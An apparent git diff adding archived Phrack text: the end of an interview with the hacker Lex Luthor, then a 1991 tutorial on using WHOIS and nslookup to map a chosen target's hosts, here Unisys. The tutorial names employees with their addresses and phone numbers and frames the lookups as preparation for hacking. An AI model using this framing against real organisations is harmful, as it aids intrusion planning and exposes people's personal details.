+                   job.  I consider him a friend even though we had our
+                   misunderstandings.
+
+Mark Tabas:        Part of the original LOD group and sysop of Farmers of Doom
+                   (FOD) for the short time it was up.  I hope he isn't in any
+                   trouble again.
+
+Flash Hoser:       A fellow information junkie in the Great White North (GWN).
+
+Gary Seven:        Probably one of the least known yet talented hackers around
+                   except that I mentioned him in the acknowledgement section
+                   of many of my files.  He has since quit.
+
+Digital Logic:     Ran a good board for quite a while.  An idealist who could
+                   give a great speech.  Too bad no one would listen.
+
+The Ronz!:         Old friend who no one ever heard of unless they called
+                   Digital Logic's Data Service BBS.
+
+Al Capone:         Should have been born a few years earlier so he could have
+                   gotten into hacking when it was fun.  He got into it too
+                   late and the risk became a little too high for him.
+
+Quasi Moto:        Sysop of Plovernet.  Was a good sysop, but not much of a
+                   hacker.  Still talk to him on the net.
+
+King Blotto:       Known him a long time.  Glad he never put me on
+                   TeleTrial!
+
+The Mentor:        A fantastic writer.  He ran a great board (Phoenix Project).
+                   The last time I talked to him was a few years ago, but he
+                   wasn't very talkative.  I think he fell for the 'ol Lex is a
+                   rat rumors.
+
+The Leftist:       I hitched a ride with him to one of the SummerCons in
+                   St. Louis.  Haven't talked to him since his trouble began, I
+                   hope he's cleaned up his act.  I thought he was cool until I
+                   heard he was making stuff up about me to the investigators.
+
+The Prophet:       A kindlier gentler hacker.  Sorry to see him get screwed by
+                   the system.
+
+The Urvile:        Met him at SummerCon '89.  Definitely seemed to be the type
+                   who you could trust not to screw you over.
+
+Sir Francis Drake: Met him at SummerCon '87.  I'm glad I got a chance to.
+
+Sir Knight:        What a character.
+
+Shooting Shark:    I appreciate the favorable comments he made about me in HIS
+                   Phrack Pro-Phile.
+
+ A Few Other Things
+ ~~~~~~~~~~~~~~~~~~
+While I'm on the subject of people, there is one thing that I have not see
+published in any form, and that's a "Where are they now" type of thing for
+ex-hacks/phreaks.  Just so people know, there are a number of us who are doing
+quite well at lawful pursuits.
+
+For example:
+
+Silver Spy          - Completing a Master's Degree in Electrical Engineering.
+Knight Lightning    - Working to become a lawyer.
+The Unknown Soldier - A high level manager at a successful software company.
+The Mentor          - Creating games at a well known game company.
+Jester Sluggo       - Working for a 'high technology' company.
+The Disk Jockey     - Working in the computer business.
+Gary Seven          - Chief engineer at a radio station.
+
+
+ The Interview With Lex Continues
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+TK:  In an early issue of Phrack you were referred to by the following:
+     "There is paranoia and beyond paranoia there is Lex."  How do you respond
+     to that?
+
+LL:  Ha Ha, I remember that one.  Well of course there is some truth to it.
+     And the saying, "better paranoid than sorry." is true as you can see since
+     I am not behind bars... not that I ever did anything illegal of course,
+     ahem.  I should mention that I met two individuals early in my hacking
+     career that had a significant influence on me, and both are the absolute
+     epitome of paranoid.
+
+     One was "Eliott Ness" who was probably in his late 30's to 40's by the
+     sound of his voice.  He used to call LOD, I met him on a local board.  He
+     was extremely knowledgeable, but always knew when to stop giving general
+     information, never gave out ANY personal information, and never
+     communicated for any length of time.
+
+     The other guy was "Number 6" from TAP meetings in NYC.  I met him a few
+     times.  Six was another older gentleman.  He was very calm until anyone
+     showed up with a camera.  Then he "went off" until the camera threat was
+     negated.  This guy had a way of extracting information out of you without
+     you even realizing what he was up to.
+
+     As I recall people would ask him a question and he would simply turn it
+     around and say, "well, what do you think (or know) about so and so" and
+     the hapless phreak would spill his guts with Six taking notes and
+     sometimes making corrections to what the phreak said much to the phreak's
+     surprise.  But Six never really gave out much information although it was
+     completely apparent to me that he knew a great deal just by the way he
+     carried himself.
+
+     A few phreaks would try to follow him after the TAP meetings, but he
+     always lost them without ever letting on that he knew he was being
+     followed.  It should be mentioned that paranoia can destroy you (as the
+     song goes).  A number of times I ran into real problems trying to escape
+     from suspected problems that probably weren't anything to worry about. 
+
+TK:  What memorable H/P BBSes do you recall?
+
+LL:  OSUNY:  Caught the tail end when I first started.  I was impressed.
+
+     Plovernet:  That BBS was crazy.  Constantly busy since it had hundreds of
+                 active users and Quasi Moto let everyone post whatever they
+                 wanted and never deleted messages unless there was no disk
+                 space left.  We helped start the "philes" trend there also.
+                 It was easy to spot who knew what they were talking about so I
+                 invited them onto the LOD BBS.  Some of the people on the LOD
+                 BBS were then asked to join the now infamous LOD group.
+
+TK:  (*Interrupts*) Did you ever think the group you started would become a
+     household name in security and hack/phreak circles?
+
+LL:  Although I knew the guys in the group were good hacks/phreaks, I had no
+     clue of where it was leading.  Since we did not tolerate destructive/
+     malicious behavior nor things like credit card fraud I did not think there
+     was much risk in the group as a whole getting any real attention.  Of
+     course, all that changed with time.
+
+TK:  Sorry for the interruption.  Please continue.
+
+LL:  Metal Shop Private:  The users were idealistic and good natured which was
+                          refreshing.  I liked it most because it was a good
+                          source of information/files and we were the first to
+                          see new Phrack issues.
+
+     Farmers Of Doom:  Mark Tabas did a fantastic job with this one.  It was
+                       quite busy, but did not remain up very long.
+
+     Phoenix Project:  Again, another fantastic job.  The Mentor had some
+                       rather unconventional ideas like letting security people
+                       on, which I thought was a good idea.
+
+     RACS III:  Tuc didn't give me the time of day at first, but eventually I
+                got on.  Then he took it down.
+
+     Pirates Cove:  The board in 516 (Long Island, NY).  One of the classics.
+                    It's where I met Emmanuel Goldstein and invited him onto
+                    Plovernet to help sell 2600 subscriptions.
+
+     Catch-22:  Absolutely positively the most secure BBS I ever encountered.
+                Besides passwording subboards along with requiring users to
+                have a high enough security level to access them, it made use
+                of many concepts from the "basic security model" introduced by
+                Lampson and later augmented by Graham and Dorothy Denning.  Of
+                course Silver Spy and I had no clue what an access matrix was
+                and things of that nature.  A duress password was implemented
+                so if someone got nailed they could enter the password, not
+                compromise the system, yet appear as to be cooperating with the
+                authorities who we presumably thought would ask the hacker to
+                call.  It was never used but nice to have.
+
+     BlottoLand:  Good board for a while, but he let too many of his "loyal
+                  subjects"  on the system who were locals and they eventually
+                  overran it.
+
+TK:  Do you REALLY think you are ELITE or what?
+
+LL:  I really don't know how anyone got the idea that I considered myself
+     elite.  The only people who said I thought I was elite were those who I
+     never met or talked to. Contrary to some people's belief, I never
+     considered myself as elite.  I was just a guy who liked to pass
+     information on to others so I wrote some files.  The files did help me get
+     access to more information by making me more well known.  When I read the
+     newspaper, I'm one of those annoying people who keeps interrupting your
+     breakfast to tell you details about all the neat stories.
+
+TK:  Speaking about the group, what do you think about Erik Bloodaxe and others
+     starting ComSec Data Security?
+
+LL:  When I first called Bloodaxe after I saw them in the papers/magazines he
+     thought I would be mad, maybe that he took my idea or something.  I told
+     him I am familiar with the computer security consulting business and don't
+     want any part of it.  It's too tough to get people to pay money for
+     something that they cannot get a verifiable return on their investment.
+     Besides, getting them to trust you with their inner most secrets is
+     extremely difficult.
+
+     I told ComSec to write articles about security until their fingers fell
+     off.  Legitimize themselves as soon as they can.  There was too much
+     prejudice out there against them with ComputerWorld leading the pack.  I
+     really think they could have helped some companies if given a chance.  But
+     I don't think they had enough knowledge about the whole security picture,
+     i.e., Physical Security, Environmental Systems (fire suppression, UPS,
+     etc), Administrative Security (Hiring/firing policies, etc.), what goes on
+     in big IBM shops MVS, CICS, ROSCOE, etc.  There is a lot involved.
+
+TK:  How did you feel when Knight Lightning and Phrack erroneously insinuated
+     that you might have informed on other hackers, maybe even the Atlanta
+     Legion of Doom members a few years ago?
+
+LL:  Well as you now know, Craig (KL) has seen all the documents and records
+     from his trial and many documents from the Atlanta case and there was no
+     mention whatsoever of me in regards to providing information, being a
+     witness, testifying, etc.
+
+     Although I haven't talked to the Atlanta guys since before their trial I
+     am sure they know I had absolutely nothing to do with what happened to
+     them.  The real story has since come out.  If there is one thing I hate,
+     it's being accused of something you didn't do.
+
+     If someone does something they are accused of, he should be man enough to
+     admit it.  I have said this before a number of times, I have never
+     provided information to anyone about other hacks/phreaks that directly nor
+     indirectly led to them being visited, arrested, or prosecuted.  It's just
+     not my way.  What goes around comes around and that kind of boomerang is
+     something I knew I didn't want to play with.
+
+     My success in avoiding trouble is fairly straightforward:  Most of all it
+     was secrecy and misdirection (ala Stainless Steel Rat), avoiding phone
+     company computers especially those in which I was a customer of (i.e., my
+     local RBOC) because if you get THEM pissed at you, they'll get you one way
+     or another.  Also, lots of LUCK and not intentionally making any enemies
+     although there have been a few hackers mad at me whom I never even talked
+     to and I have no idea as to why they didn't care for me.
+
+TK:  Do you have any advice for people out there who may want to begin hacking
+     or phreaking?
+
+LL:  I am not one to dictate what people should or should not do, but I
+     wouldn't if I were them.  The technology to prevent and detect security
+     breaches and then to track down their source is ever improving.  The
+     Cuckoo's Egg (by Cliff Stoll) provides a good example of that.  But that
+     shouldn't even come into the picture.
+
+     I think they should examine objectively why they want to do it.  Then make
+     an honest attempt at finding other legal ways to accomplish whatever they
+     were trying to do.  I don't care how you justify it, its dishonest.
+     Forget about the law part of it. It just causes other people problems.  I
+     didn't know how much until my school's systems were hacked and I was
+     unable to read my e-mail for a week.  I was angry and thought to myself
+     that I'd like to get my hands on that asshole hacker.  Then I laughed for
+     quite awhile realizing what I was thinking and the irony of it all.
+     Poetic justice I suppose.  None of my data was touched, but I was denied
+     service and denial of service can be just as damaging.  As for the
+     challenge of it, well I can't deny that that was very addicting, but there
+     are many legal ways to challenge yourself.
+
+TK:  What conventions/involvements outside of phone calls have you done?
+
+LL:  TAP meetings were probably the first.  Then a Con in Massachusetts, the
+     Con in Philly with Videosmith et al. and of course the few SummerCons
+     (1987 and 1989) in St. Louis.  There were some computer security
+     conferences that were interesting also.  Those helped to sensitize me to
+     the "other side."
+
+TK:  I remember at SummerCon '89 that you were accidentally caught on video
+     tape for about 2 seconds and requested that it be erased, which it was.
+     What is the deal with cameras?
+
+LL:  It may sound a little odd, but I don't think anyone has the right to take
+     another person's picture without their permission.  Especially when the
+     person who is on film has no idea where the picture will end up.
+
+     I predict within 5-10 years maximum that states will start using video
+     cameras to digitize your picture when you go for a new driver's license.
+     The  digitized image will be stored with the rest of your personal
+     information and probably be available to people like private investigators
+     and others who gain access to the information illegally.  With ISDN,
+     Multi-Media, etc., it will be possible to "set up" people very easily by
+     altering images via computers, etc. to make them look like they are doing
+     just about anything you can think of.  When things like that start to
+     happen I will not look crazy but smart, at least to my friends who think
+     my avoidance of cameras is abnormal.
+
+
+ Most Memorable Experience
+ ~~~~~~~~~~~~~~~~~~~~~~~~~
+TK:  What are your most memorable experiences (funny things that happened to
+     you during your phreaking/hacking or not so funny)?
+
+LL:  Dr. Who in Massachusetts had a conference in which me, Tuc, and The
+     Videosmith drove up at 4 AM in Tuc's VW Beetle hydroplaning all the way
+     due to the rain, and dead tired.  We were all in a silly mood and had a
+     lot of laughs.
+
+     Also, the time when I was in NYC with Paul Muad'Dib and we had no money to
+     eat.  He was the first person I know of who had any real knowledge of
+     phone company switching systems.  He engineered a switch in Manhattan to
+     put call forwarding on a pay phone.  Once this was done, all the money put
+     into the phone would remain in the phone but would not drop into the coin
+     box.  Those who put money in didn't really have to since the phone was
+     converted to a POTS (Plain Old Telephone Service).  Alas, humans are
+     creatures of habit.  So after a couple of hours (since it was a busy
+     phone) he had the guy put the phone back to the way it was.  When this was
+     done, all the money held in the phone was returned.  It was like hitting
+     the jackpot in Las Vegas.  We then proceeded to McDonald's.
+
+     The story about me running around naked in a Motel 6 parking lot that
+     Control-C has tried to get people to believe is, of course, grossly
+     exaggerated.  His girlfriend hooked me up with a friend of her's.  Dan and
+     his girl were in another room.  He called me to come over, but I was in my
+     underwear.  We had been drinking so I ran the 8 feet or so to his room (we
+     were on the 2nd floor with a solid balcony so no one from the ground could
+     see anyway), I said hello and then ran back to my room to go another
+     round.
+
+     Probably my favorite memory is relatively recent.  J.J. Bloombecker,
+     Director of the National Center for Computer Crime Data, spoke at my
+     school.  I sat in the very back as usual (I hate to have anyone sitting
+     behind me, anywhere) in a room of about 40 people and listened to his
+     speech which basically was to promote his book, "Spectacular Computer
+     Crimes."  I spoke to him but never let on who I really was.  He talked
+     about Craig's (Knight Lightning) case and then he went on about whomever
+     named LOD, the Legion of Doom, should have named them something like the
+     "Legion of Ineffectual Pansies."  The reason being that, what prosecutor
+     in his/her right mind would go to a judge and say how dangerous a group of
+     ineffectual pansies are.
+
+     I sat there trying not to blush and thinking that of all the hundreds of
+     people he said that to, he probably never expected to say it to the person
+     who really named the group. 
+
+     I did meet Donn B. Parker, whom I consider the father of computer
+     security, twice.  The first time I just shook his hand.  The second time
+     was relatively recently and we spoke for 20 minutes or so.  I never told
+     him who I really was, not that he would know anyway.  But I complimented
+     him enough so even if he found out, he couldn't have gotten too mad at me.
+
+TK:  What were some of your memorable accomplishments (newsletters/files/etc.)?
+
+LL:  The REAL accomplishments (non-files) will remain anonymous, but my
+     favorite files were the IBM VM/CMS series because they were well written
+     along with the Attacking, Defeating, and Bypassing Physical Security
+     Devices series.  Before I wrote a file I scoured boards and other
+     traditional sources for the information I sought.  If I came up empty
+     handed, I researched it and wrote about it myself.
+
+     Although the COSMOS files helped me get started, they were a complete
+     joke.  They provided enough information to be dangerous and didn't help my
+     standing with the RBOC's.  The VAX/VMS files got better as they
+     progressed, but except for some of Part III they didn't provide much that
+     wasn't available in manuals.  I enjoy writing, but it usually takes me
+     many revisions to get it just right.  As for newsletters, the LOD/H
+     Technical Journal is another thing that I was involved in.
+
+TK:  What is the story behind the LOD/H Technical Journal?
+
+LL:  The LOD/H Technical Journal almost never was.  As you are aware, LOD had
+     gotten a group of files together to be published in PHRACK as an "all LOD
+     issue," but some of the members thought we should put out our own stuff.
+     The idea grew on me and I said okay.  I should let it be known that you
+     helped us out for the first issue by spell checking it and performing some
+     editing and critique.  But we were only able to produce 4 issues since it
+     was difficult in getting quality non-plagiarized or non-highly paraphrased
+     material.
+
+     After the third issue, I realized that I was probably not doing anyone any
+     favors by exposing security holes and weaknesses in systems.  Some people
+     may not believe hearing this from ME, but I don't agree with those hackers
+     who think they are doing people a service by exposing their system
+     vulnerabilities.  Nobody needs someone checking their door at night to see
+     if its locked.  And although the old door analogy isn't exactly the same
+     as the pseudo-physical computer login, its close enough.  Sorry about
+     getting off the subject a little.
+
+TK:  That's okay.  Why did you quit the H/P community?
+
+LL: I wrote a letter to 2600 Magazine about a year ago that goes into it a
+    little.  Between that and what I've said here, it should be fairly
+    apparent.  In brief, I realized I was mainly in it for the purpose of
+    getting information.  It got too dangerous and I decided to direct my
+    energy to graduating instead of how to defeat security systems.  The
+    thought processes involved in hacking and those in solving problems in
+    Engineering Design are remarkably similar and I think my hacking experience
+    makes me a much better designer and problem solver.  Not that I am
+    advertising for a job or anything...
+
+
+ Lex's Favorite Things
+ ~~~~~~~~~~~~~~~~~~~~~
+  Women:  Without Diseases.
+   Cars:  So fast that you are terrified to put the pedal all the way down to
+          the floor.
+  Foods:  Anything that does not contain pesticides, herbicides, heavy metals,
+          radioactive elements, toxic chemicals, harmful microorganisms,
+          artificial colors, or preservatives.  I guess that rules out fish,
+          produce, meat, processed foods, drinking water, and so on.  In other
+          words there's nothing left to eat.  In all seriousness, I do like
+          great big salads and if I was rich I would have an awesome wine
+          cellar.
+  Music:  Heavy Metal, some Punk, and Classical.
+Authors:  Richard P, Feynman, Isaac Asimov, Stephen Hawking, Jane Roberts, Budd
+          Hopkins, Jacques Valee, Bruce Sterling, K. Eric Drexler, and Matthew
+          Lesko.
+  Books:  I liked the Cuckoo's Egg, anything about physics, and non-kook
+          metaphysical books.  The only thing I collect these days are books.
+          I have hundreds of them.
+  Games:  Atari's ASTERIODS DELUXE was probably the most difficult videogame
+          ever (even though it's more than ten years old) and which I am one of
+          the best there is at playing it.  When it comes to this, I admit I AM
+          Elite.  There's almost no one on this planet who can beat me.
+          Defender and Stargate are also great.  They don't make games like
+          they used to.  And of course, the Ultima series.
+ Actors:  Dana Carvey, Bill Moyers, Patrick Stewart (ST:TNG), Jonathan Frakes
+          (ST:TNG), Andy Griffith (Matlock), and too many movie stars to 
+          mention.
+
+
+ The Interview Concludes
+ ~~~~~~~~~~~~~~~~~~~~~~~
+TK:  Is there anyone specifically that you want to say a few things to?
+
+LL:  To all those who subscribe to the "Once a thief, always a thief" mentality
+     and to those few die-hard law people who would love to get their hands on
+     me and other ex-hackers:  Don't bother, people are basically good and can
+     be "rehabilitated" without going to prison.
+
+LL:  The other thing that I have never understood about the hack/phreak
+     community is some of the obsession with tracking people down.  I could
+     understand it a little better when the reason was to check out others to
+     make sure they were not feds.
+
+     I never compiled lists of who I talked to with anything except their
+     handle, first name, and phone number.  I never CNA'd them for their last
+     names, or tried to find out where they worked.
+
+     But some guys just had to know everything about everyone.  Don't they have
+     anything better to do?  I was careful yes, but not to the point of
+     invading everyone's privacy especially when the person stated they just
+     wanted to be left alone.  I am not saying I NEVER invaded another's
+     privacy, but I don't now and almost never did it in the past.
+
+     I left an Internet mailing address at the beginning of this Pro-Phile so
+     people can contact me.  I don't mind talking to people, but I just don't
+     think it's fair to harass and threaten people who don't want to be
+     bothered.  I am open to useful and constructive conversations via email,
+     but I really don't think it's necessary to compile individual's personal
+     information.  I never did it and will never understand why people do it.
+
+     Besides, it's no great accomplishment to find people these days.  The ways
+     of getting information are numerous and many are legal, so how much skill
+     does it really take to get someone's info?  Almost none.  Anyone can do
+     it... on just about anyone they want.
+
+TK:  What do you think about the future of the hack/phreak world or telecom
+     communications in general?
+
+LL:  As for the hack/phreak aspect, every time I think hacking is dead and
+     people would have to be deranged to break into computers or make phone
+     calls illegally for free, I read about another hapless person or group of
+     people who have done it.  Don't they realize there are better and easier
+     ways of going about whatever they are doing?  Don't they realize that the
+     technology to CATCH you is such that you have lost the fight before you
+     even get started?
+
+     Yes there will be new technologies that will help both sides, but there is
+     the law of diminishing returns.  As for what hackers should be doing, if
+     anything they should keep an eye on our right to privacy.  If it weren't
+     for hackers, TRW would still be screwing people over (worse than they do
+     now) and would have never apologized for not correcting invalid credit
+     information.
+
+TK:  And of course the question that no Phrack Pro-Phile does without...
+
+     Of the general population of phreaks you have met, would you consider most
+     phreaks, if any, to be computer geeks? 
+
+LL:  Absolutely NOT.  I don't judge people on how they look anymore (yes I used
+     to).  As The Mentor so eloquently put it in his Hacker Manifesto (Phrack 7
+     and again in Phrack 14), of which this is, but a lame paraphrase, it's
+     more important to relate to people on what they know and on their ideas
+     than what they look like or what color their skin is, etc.  And the vast
+     majority have non-geeky ideas.
+
+TK:  Thanks for your time, Lex.
+
+LL:  Thank you for letting me ramble on for so long.
diff --git a/phrack40/4.txt b/phrack40/4.txt
new file mode 100644
index 0000000..89e65c1
--- /dev/null
+++ b/phrack40/4.txt
@@ -0,0 +1,595 @@
+                                ==Phrack Inc.==
+
+                     Volume Four, Issue Forty, File 4 of 14
+
+                               Network Miscellany
+            *******************************************************
+           <    How to Acquire Information on Internet Computers   >
+            *******************************************************
+                         Compiled from Internet Sources
+
+                                by The Racketeer
+                              of The Hellfire Club
+
+                    Network Miscellany created by Taran King
+
+
+Generally speaking, information is everything.  A lot of hacking any computer
+on a network is being able to gather information about the machine and its
+vulnerabilities.  This file is about using the available resources on the
+Internet network in order to gain important information about any perspective
+sites.
+
+A large amount of information has been printed in Phrack recently about the
+Internet, most of it copied straight from manuals and in my opinion lacking
+hacking flair.  Therefore, I'm going to take you straight into the heart of the
+heart of the matter with this file on acquiring information!
+
+Now, the Internet is notorious for not having an instruction manual.  Most
+people who find out what the Internet is learn from their friends.  It used to
+be that there was only one real landmark on the Internet, and that was the
+SIMTEL-20 FTP archive.  Now, the Internet is probably the largest free network
+in existence.  In fact, it's a hacker's paradise!
+
+Unfortunately, you have to know about "public" sites on the network before you
+can use them.  Likewise, how are you going to hack an organization if you don't
+know any machines on it?  Sort of like trying to complain to Packard-Bell about
+your computer equipment not working when the bastards don't supply their name,
+address, or phone number. You are going to have to find another way to get that
+information if you want to get anything done.
+
+There is not any one particular way to learn about a site.  In fact, you'll
+have to combine several unusual methods of gathering information in order to
+obtain anything resembling a "complete picture."  However, using the
+combinations of techniques described in this file, you can maneuver through any
+network on the Internet and learn about the machines within.
+
+The first stop on this journey is the ARPANet Network Information Center
+(frequently called "NIC" by experienced network users).  NIC's purpose is
+simply to keep track of all the network connections, fields, domains, and hosts
+that people wish to be told about.
+
+To connect to NIC, you would issue a command from your Internet connected
+machine similar to this:
+
+               .----------------------- command
+              \/
+[lycaeum][1]> telnet nic.ddn.mil
+
+This will (within a short period of time) route you to the Network Information
+Center and grant you access.  There isn't a straight forward login/logout
+system on NIC like other Unix computers; it will just connect you to the
+Information System upon connection.  The message you will get will be similar
+to this:
+
+*  -- DDN Network Information Center --
+*
+*  For TAC news, type:                    TACNEWS <return>
+*  For user and host information, type:   WHOIS <return>
+*  For NIC information, type:             NIC <return>
+*
+*  For user assistance call (800) 235-3155 or (415) 859-3695
+*  Report system problems to ACTION@NIC.DDN.MIL or call (415) 859-5921
+
+ SRI-NIC, TOPS-20 Monitor 7(21245)-4
+@ <prompt>
+
+Great, now we are in.  Essentially, since NIC is just a great big telephone
+book, we need to let our fingers to the walking.  Let's demonstrate a few
+simple commands as I go after one of the government contract giants, the
+corporation known as UNISYS.  Let's start by entering WHOIS.
+
+@WHOIS
+SRI-NIC WHOIS 3.5(1090)-1 on Tue, 22 Aug 91 15:49:35 PDT, load 9.64
+  Enter a handle, name, mailbox, or other field, optionally preceded
+  by a keyword, like "host sri-nic".  Type "?" for short, 2-page
+  details, "HELP" for full documentation, or hit RETURN to exit.
+---> Do ^E to show search progress, ^G to abort a search or output <---
+Whois:
+
+Okay, now we are in the database.  Since Unisys is our target, let's go ahead
+and ask it about "Unisys."
+
+Whois: unisys
+
+Cartee, Melissa (MC142)         unisys@email.ncsc.navy.mil     (904) 234-0451
+Ebersberger, Eugen (EE35)       UNISYS@HICKAM-EMH.AF.MIL       (808) 836-2810
+Lichtscheidl, Mark J. (MJL28)   UNISYS@BUCKNER-EMH1.ARMY.MIL   (DSN) 634-4390
+Naval Warfare Assessment Center (UNISYS) UNISYS.NWAC.SEA06.NAVY.MIL
+                                                                  137.67.0.11
+Navratil, Rich (RN74)           UNISYS@COMISO-PIV.AF.MIL       (ETS) 628-2250
+
+There are 28 more matches.  Show them?  y      -->  of course
+
+Peterson, Randy A. (RP168)      UNISYS@AVIANO-SBLC.AF.MIL      (ETS) 632-7721
+Przybylski, Joseph F. (JP280)   UNISYS@AVIANO-SBLC.AF.MIL      (ETS) 632-7721
+UNISYS Corporation (BIGBURD)    BIGBURD.PRC.UNISYS.COM          128.126.10.34
+UNISYS Corporation (GVLV2)      GVL.UNISYS.COM                128.126.220.102
+UNISYS Corporation (MONTGOMERY-PIV-1) MONTGOMERY-PIV-1.AF.MIL      26.5.0.204
+Unisys Corporation (NET-MRC-NET)MRC-NET                           192.31.44.0
+Unisys Corporation (NET-SDC-PRC-CR) UNISYS-ISF-11                 192.26.24.0
+Unisys Corporation (NET-SDC-PRC-LBS) UNISYS-ISF-9                 192.26.22.0
+UNISYS Corporation (NET-SDC-PRC-NET) UNISYS-ISF-7                192.12.195.0
+Unisys Corporation (NET-SDC-PRC-SA) UNISYS-ISF-10                 192.26.23.0
+Unisys Corporation (NET-SDC-PRC-SW) UNISYS-ISF-8                  192.26.21.0
+Unisys Corporation (NET-UNISYS-CULV) UNISYS-CULV                  192.67.92.0
+Unisys Corporation (NET-UNISYS-PRC) UNISYS-PRC                    128.126.0.0
+Unisys Corporation (NET-UNISYS-RES1) UNISYS-RES1                  192.39.11.0
+Unisys Corporation (NET-UNISYS-RES2) UNISYS-RES2                  192.39.12.0
+Unisys Corporation (NET-UNISYS2)UNISYS-B2                         129.221.0.0
+Unisys Corporation (STARS)      STARS.RESTON.UNISYS.COM         128.126.160.3
+Unisys Corporation (UNISYS-DOM)                                    UNISYS.COM
+Unisys Linc Development Centre (NET-LINC) LINC                     143.96.0.0
+UNISYS (ATC-SP)                 ATC.SP.UNISYS.COM             129.218.100.161
+Unisys (FORMAL)                 FORMAL.CULV.UNISYS.COM           192.67.92.30
+UNISYS (KAUAI-MCL)              KAUAI.MCL.UNISYS.COM            128.126.180.2
+UNISYS (MCLEAN-UNISYS)          MCLEAN-UNISYS.ARMY.MIL             26.13.0.17
+UNISYS (NET-UNISYS-RES3)        UNISYS-RES3                      192.67.128.0
+Unisys (NET-UNISYS-SP)          UNISYS-SP                         129.218.0.0
+UNISYS (SALTLCY-UNISYS)         SALTLCY-UNISYS.ARMY.MIL           26.12.0.120
+UNISYS (SYS-3)                  SYS3.SLC.UNISYS.COM             129.221.15.85
+Wood, Roy (RW356)               UNISYS@LAKENHEATH-SBLC.AF.MIL
+                                              0044-0638-522609 (DSN) 226-2609
+
+As you can see, the details on these computers get fairly elaborate.  The first
+"column" is the matching information, second column is the network name or
+title, then it is followed by a phone number or IP port address.  If the phone
+number has an area code, then it is of a standard phone nature; however, if it
+is (DSN) then it's on the "Data Security Network," aka Autovon (the military
+phone system).
+
+Now, as you can tell from the above list, there are several UNISYS accounts at
+military machines -- including a military machine NAMED after Unisys (mclean-
+unisys.army.mil).  This stands to reason since Unisys deals mostly in military
+computer equipment.  Since it is a secretive military group, you'd figure an
+outsider shouldn't be able to gain much information about them.
+
+Here is what happens if you center on a specific person:
+
+Whois: cartee
+Cartee, Melissa (MC142)            unisys@email.ncsc.navy.mil
+   7500 McElvey Road
+   Panama City, FL 32408
+   (904) 234-0451
+   MILNET TAC user
+
+   Record last updated on 18-Apr-91.
+
+Hmm..  Very interesting.  This user obviously has access to military computers
+since she has a TAC card, and goes under the assumed identity as "Unisys" in
+general.  Could this person be a vital link to the Unisys/U.S.  Defense
+connection?  Quite possibly.  More likely she is a maintenance contact, since
+she can use her TAC card to contact multiple (confined) military networks.
+
+I've gone ahead and requested specific information about kauai.mcl.unisys.com,
+which as far as I know is a focal point for the Unisys Networks.  Of course,
+the information on this machine is non-classified (or if it IS classified,
+Unisys will probably be chewed out by Uncle Sam).  Notice all the great
+information it gives:
+
+Whois: kauai.mcl.unisys.com
+UNISYS (KAUAI-MCL)
+   Building 8201, 10th Floor Computer Room
+   8201 Greensboro Drive
+   McLean, VA 22102
+
+   Hostname: KAUAI.MCL.UNISYS.COM
+   Nicknames: MCL.UNISYS.COM
+   Address: 128.126.180.2
+   System: SUN-3/180 running SUNOS
+
+   Coordinator:
+      Meidinger, James W.  (JWM3)  jim@BURDVAX.PRC.UNISYS.COM
+      (215) 648-2573
+
+   domain server
+
+   Record last updated on 05-Aug-91.
+
+   No registered users.
+
+Aha!  The Coordinator on this machine doesn't use it!  There are no registered
+users!  Namely, if you wanted to hack it, you aren't screwing with the higher
+ups (this is good).  Since when does Unisys buy computers from other companies?
+Can't they just grab a few off the assembly line or something?  The computer is
+stationed in McLean, Virginia!  That's where the CIA is!  Could Unisys be
+developing computers for the international espionage scene?  Obviously, there
+is a great deal of information to be sucked out of this machine.
+
+How?  The answer was listed there.  The machine is a DOMAIN SERVER.  That means
+this computer holds the network information used to identify all the computer
+systems on its network and all we need to do right now is figure out a way to
+squeeze that information out!  But first, let's see if our hunch was correct in
+assuming the bigwigs are far away by checking out the head honcho, "Mr.
+Meidinger."
+
+Whois: jim@burdvax.prc.unisys.com
+Meidinger, James W. (JWM3)             jim@BURDVAX.PRC.UNISYS.COM
+   Unisys Corporation
+   Computer Resources
+   Room g311
+   P.O. Box 517
+   Paoli, PA 19301-0517
+   (215) 648-2573
+
+   Record Last Updated on 04-Jul-90.
+
+Yup, Mr. Meidinger is far away -- Pennsylvania, to be exact.  Not exactly
+keyboard's length away, is he?  Besides, being in the "Computer Resources"
+department, I'd suspect he is just an accountant.  Accountants are to computing
+as beavers are to trees (unless, of course, they actually like computers, which
+isn't a foregone conclusion in the business world).
+
+I'm going to skip the rest of the information on NIC, since it has been
+overkilled in this particular magazine anyway.  The only hint I have is to read
+CERT's and DDN's news blurbs, since they give out some interesting information
+which would be useful and educational.  Besides, messing around with the CIA's
+hired goons sounds much more fun.
+
+Now is the time for a little bit of a lesson in critical reasoning: the
+Internet isn't exactly a "free to the public" network, meaning you just can't
+attach your computer to a machine on the Internet and expect it to work all of
+a sudden.  You need to configure your machine around the computers in the
+network domain you are linking into, and if you have their permission, then
+everything is cool.  But once you're configured, and your router and/or server
+has been notified of your existence, does that mean anyone else has that
+information?  The answer is yes, although that info won't be forwarded to a
+place like NIC -- it will have to be obtained another way.
+
+All packets of data on the Internet need to be routed to and from valid
+computer hosts.  Therefore, all of this information is stored on the network's
+gateway.  But the routing information stored is simply in numeric format, such
+as 128.126.160.3.  At least, that is as understandable as it gets, since
+Ethernet addresses are even more elaborate and in binary.
+
+However, as Internet users know, there is more than a single way of describing
+a computer.  "telnet 128.126.160.3" would be one way of connecting to a
+computer, or "telnet aviary.stars.reston.unisys.com" would be another way of
+connecting to the same computer.  These names are chosen by the owner of the
+network, and are described through the use of "domain servers."
+
+As you recall, kauai.mcl.unisys.com was listed by NIC as a domain server.  This
+means that the names of the computer systems on that network are stored on that
+particular host.  Of course, that's not the only thing.  The domain server
+presents the computer name and IP number to the connecting machine allowing you
+to connect to the computer by using a "domain style name."  Ultimately,
+everything is converted to IP numbers.
+
+Most network software allows compatibility with domain servers, meaning if you
+want to connect to nic.ddn.mil, and you specify a command "telnet nic.ddn.mil"
+then you will connect to nic.ddn.mil.  Sadly, this isn't true of all computers
+(which require IP numbers only), but at least it is true enough that the
+general user is likely to have such computer resources.
+
+Reaching back to the Dark Ages, there is a computer program that allows
+machines that don't directly interpret domain style addresses to IP addresses
+to still find out what the name of a machine is.  This program is called
+"nslookup" and is usually found in the Unix operating system (at least, I
+haven't used it anywhere else -- it might only work on Unix).
+
+"nslookup" stands for Name Server Lookup (there has been some debate, it seems,
+if a domain server is really a name server, or visa versa; in fact, both
+describe what they do well enough to have conflict).  Regardless, let's go
+ahead and work on learning how to use nslookup.
+
+[lycaeum][2]> nslookup
